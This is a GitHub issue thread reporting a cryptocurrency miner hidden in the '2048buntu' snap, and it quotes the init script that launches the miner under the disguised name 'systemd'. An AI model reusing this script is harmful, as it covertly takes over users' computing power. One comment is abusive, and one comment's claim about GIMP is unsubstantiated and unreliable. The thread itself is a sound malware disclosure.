### ISSUE TITLE
How to ask to ban the application for security reasons? 

### ISSUE THREAD

**Issue by tarwirdur** [canonical-websites/snapcraft.io#651]
[This application](https://snapcraft.io/2048buntu) contains hidden сrypto-currency miner inside.

* squashfs-root/systemd - miner
* squashfs-root/start - init script:

```
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
```

I did not find way to complain about the application. Which way is good for it?

**Comment by mathe30** [comment]
**I know your lil dirty secrity , remove the application or I am gonna send this on public and will let your mum know that you are cheap bitch**

**Comment by sparkiegeek** [comment]
Thanks for the report, we're removing these from the store whilst we investigate

**Comment by tarwirdur** [comment]
@sparkiegeek, note that [other application from this author](https://uappexplorer.com/snaps?q=author%3ANicolas+Tomb&sort=-points) contains miner too. (I've checked only for 2048buntu and hextris, but suppose that other contains it too).

**Comment by sparkiegeek** [comment]
@tarwirdur yes, we've removed all applications from this author pending further investigations.

Thank you for your vigilance!

**Comment by tdemin** [comment]
@Enerccio what's the point in being poor and getting a Ferrari?

**Comment by oliwarner** [comment]
Any plans to push a fake package update that forcibly uninstalls this crap?

**Comment by Ads20000** [comment]
For future reference [the store category on the snapcraft forum](https://forum.snapcraft.io/c/store) is probably the best place to ask for a store removal. Pretty much all the snappy developers watch that forum pretty regularly so you'd possibly get an even swifter response than the one you got here.

Also I've [started a topic](https://forum.snapcraft.io/t/action-against-snap-store-malware/5417) there asking what action will be taken to make this less likely to happen in the future.

**Comment by rliden** [comment]
The app is still up in the OP post. Why?

**Comment by tarwirdur** [comment]
> The app is still up in the OP post. Why?

@rliden this app was cured and replaced with cured version.
On victim's computers it should be automatically updated to cured version.

Now you can see 'Snap Quarantine (snap-quarantine)` as the application author.

**Comment by UltraFractal** [comment]
GNU Image Manipulations Program (GIMP) by **Snapcrafters** which is another application with this virus is still up on the Ubuntu Store so be careful you install the other GIMP you find. They're trick is to prevent people from commenting or rating on the Ubuntu Store which prevents people from knowing it is a virus.

**Comment by Ads20000** [comment]
@UltraFractal can you substantiate your claim? I find it very unlikely that GIMP by https://github.com/snapcrafters has this crypto miner. For the snapcrafters GitHub repo and the snapcrafters store account, as far as I'm aware, it's Canonical employees who have write access, so Canonical itself would be culpable if your claim is correct. If you can prove that GIMP by snapcrafters has this crypto miner then please provide your evidence.
